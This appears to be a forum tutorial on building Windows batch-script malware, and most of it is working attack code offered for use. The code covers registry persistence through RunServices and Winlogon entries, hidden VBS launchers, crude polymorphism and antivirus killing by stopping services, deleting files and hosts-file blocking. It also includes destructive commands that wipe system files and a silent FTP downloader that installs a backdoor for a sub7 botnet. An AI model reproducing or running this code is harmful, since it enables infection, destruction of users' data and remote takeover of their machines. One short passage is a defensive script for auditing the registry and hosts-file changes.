You wanna make a MALWARE via DOS/BATCH SCRIPT?
okay so i will tell you now what you have to do for a good worm / virus you need a structure so you can take the one from Mega
or
you take mine
thats my art:
Code:
the first block has to be an autostart script (registry entry, autostart copy, file injection/infection), because if the user closes it, it has to start again
@((
:block1:
@echo off & break off
...
)
)
)
code for runservice registry infection:
Code:
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices /v "shownproccessname" /d ">yourfile<" /f
code for userinit winlogon infection:
Code:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "C:\WINDOWS\system32\userinit.exe," /f
also there have to be anything that makes it silent
we're taking this batch code that will drop a shell code
Code:
echo Set objShell = CreateObject("WScript.Shell") >>%windir%\system32\shellhost.vbs
echo strCommand = "" >>%windir%\system32\shellhost.vbs
echo objShell.Run strCommand, vbHide, TRUE >>%windir%\system32\shellhost.vbs
i hope you understand thats all
okay you have to know i wouldnt let the worm copy to %windir% or %windir%\system32
because every user would look into this folder first if he thinks it is infected
so take this for example
copy %0 %windir%\system32\etc\
so next we make an execution morphism
i've got my own system :
-after each 6 commands you should write a :%random%:
like:
Code:
ping google.com
ping google.com
ping google.com
ping google.com
ping google.com
ping google.com
:%random%:
-if you write a jump ( for example :bla)
use this
Code:
set blabla=%random%
:%blabla%
ping bla
goto %blabla%
you can use additional atomical's polymorphic engine
now we write a dll engine
you can't combine the winlogon injection with the dll engine !!
look and learn
Code:
@(((
set bla=assoc) & @(
%bla% .dll=batfile
if not exist %windir%\system32\drivers\driver.dll (@copy %0 %windir%\system32\drivers\driver.dll
:%random%:
) & @(
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices /v "drivers" /d "%windir%\system32\drivers\driver.dll" /f
):%random%:
)
)
next lesson antivir killing
you can kill antivirs in several ways
-block security websites
-kill the tasks
-stop the services
-delete the files
i give examples:
Code:
will stop the firewall and stop mcafee servicenetsh firewall set opmode mode=disable
net stop MCAFEE
Code:
tskill works only for xp so you ahve to write taskill (for vista) and tskill that piece of code kills the task av (antivir)tskill /A av* & taskill av*
Code:
that kills 100% the antivir personal edition totally the process doesnt need to close after thisif exist "%programfiles%\AntiVir PersonalEdition Classic" del /F /S /Q "C:\Programme\Avira\AntiVir PersonalEdition Classic\*.*"
Code:
this block the symantec antivir websiteecho 127.0.0.1 www.symantec.com >%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 symantec.com >>%windir%\system32\drivers\etc\hosts
you can have the full antivir killer on my other thread
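For defenders, the hosts-file change shown above is easy to audit. The following is an added example, not code from the original post: it parses hosts-file text and reports watched security-vendor domains that resolve to a loopback or unspecified address. The watchlist, the function names and the sample file are assumptions constructed for illustration.

```python
import ipaddress

# Assumption: the defender maintains this watchlist; only the domain
# named on the page is listed here.
WATCHLIST = ("symantec.com",)

# Constructed sample hosts file, not taken from a real machine.
SAMPLE_HOSTS = """\
127.0.0.1 localhost
127.0.0.1 www.symantec.com
127.0.0.1 symantec.com
10.0.0.5 intranet.example
0.0.0.0 update.symantec.com  # trailing comment
"""

def parse_hosts(text):
    """Yield (ip, hostname) pairs, ignoring comments and blank lines."""
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()
        for host in fields[1:]:
            yield fields[0], host.lower().rstrip(".")

def is_sinkhole(ip):
    """True when the address points back at the local machine or nowhere."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return addr.is_loopback or addr.is_unspecified

def blocked_security_hosts(text, watchlist=WATCHLIST):
    """Return (hostname, ip) for watched domains that are sinkholed."""
    hits = []
    for ip, host in parse_hosts(text):
        watched = any(host == d or host.endswith("." + d) for d in watchlist)
        if watched and is_sinkhole(ip):
            hits.append((host, ip))
    return hits

if __name__ == "__main__":
    for host, ip in blocked_security_hosts(SAMPLE_HOSTS):
        print(f"ALERT hosts file redirects {host} to {ip}")
```

Because the first command on the page writes with `>` rather than `>>`, the resulting hosts file also loses its stock contents, so an unusually short hosts file is a second signal worth checking.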
now we come to the harmful lesson
so, there are these possibilities
Code:
with this the computer cannot boot anymoreattrib -h -s -r C:\*
del C:\*.* & del C:\ntldr
Code:
without this windows cannot make anythingren %windir%\system32\hal.dll %windir%\system32\hal.dlllol
this code only renames a important file
Code:
deletes easy all files (after this no bat file can run anymore)del /f /q %windir%\*.* & del /f /Q %windir%\system32\*.*
hmm if there are any ANYYYY question spreading or infection or injection or ANYTHING WITH BATCH you can ask me and i know 100% the code but per pm
Continue:\\
now we make a download batch thats download for example a backdoor or trojan very important is there that it is 100% silent:
Code:
@echo off & break off
:block1:
@(((
:part2:
type %0 > %windir%\system32\drivers\svch.bat
echo Set objShell = CreateObject("WScript.Shell") >>%windir%\system32\shellhost.vbsecho strCommand = "%windir%\system32\drivers\svch.bat" >>%windir%\system32\shellhost.vbs
echo objShell.Run strCommand, vbHide, TRUE >>%windir%\system32\shellhost.vbs) & @(
:part2:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "C:\WINDOWS\system32\userinit.exe,%windir%\system32\shellhost.vbs" /f >nul)
:part3:
)
if not exist %windir%\system32\drivers\backd.exe (
echo ftp >%windir%\system32\drivers\ftpecho >>%windir%\system32\drivers\ftp
echo >%windir%\system32\drivers\ftpecho get backd.exe
))
:block2:
@(ftp -s:%windir%\system32\drivers\ftp >nul
@reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v shell /d "explorer.exe,%windir%\system32\drivers\backd.exe /f >nul
ping localhost -n 3 >nul)
exit
it creates a shell that will be active on restart, then it is invisible and process resistant (because of the winlogon injection), then it logs into your ftp and downloads backd.exe. it sets a registry entry and on restart the backdoor is active
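Both the Userinit command near the top of this post and the script above change the Winlogon `Userinit` and `Shell` values, which makes those values a reliable place to look during triage. The following is an added example, not code from the original post: it parses the text output of `reg query` for the Winlogon key and reports every entry beyond the stock default. The expected defaults assume Windows on `C:`, and both sample outputs are constructed.

```python
import re

# Stock values for the Winlogon key (assumption: Windows installed on C:).
EXPECTED = {
    "userinit": [r"c:\windows\system32\userinit.exe"],
    "shell": ["explorer.exe"],
}

# Constructed `reg query` output for the Winlogon key, not real captures.
CLEAN = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    Userinit    REG_SZ    C:\WINDOWS\system32\userinit.exe,
    Shell    REG_SZ    explorer.exe
"""
TAMPERED = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    Userinit    REG_SZ    C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\shellhost.vbs
    Shell    REG_SZ    explorer.exe,C:\WINDOWS\system32\drivers\backd.exe
"""

def parse_reg_query(text):
    """Map lower-cased value names to their data from `reg query` text."""
    values = {}
    for line in text.splitlines():
        m = re.match(r"^\s+(\S+)\s+REG_\w+\s*(.*)$", line)
        if m:
            values[m.group(1).lower()] = m.group(2).strip()
    return values

def audit_winlogon(text):
    """Return (value, entry) pairs for entries beyond the stock default."""
    findings = []
    values = parse_reg_query(text)
    for name, allowed in EXPECTED.items():
        entries = [e.strip().strip('"').lower()
                   for e in values.get(name, "").split(",")]
        findings += [(name, e) for e in entries if e and e not in allowed]
    return findings

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN), ("tampered", TAMPERED)):
        print(label, audit_winlogon(sample))
```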
so my friend asked me if i could make a botnet in batch of course it wont work but with a bit help with a sub7 trojan with the method above and the combination of my AV killer it works
you have to set an irc server in the sub7 but i explain it more in my next tutorials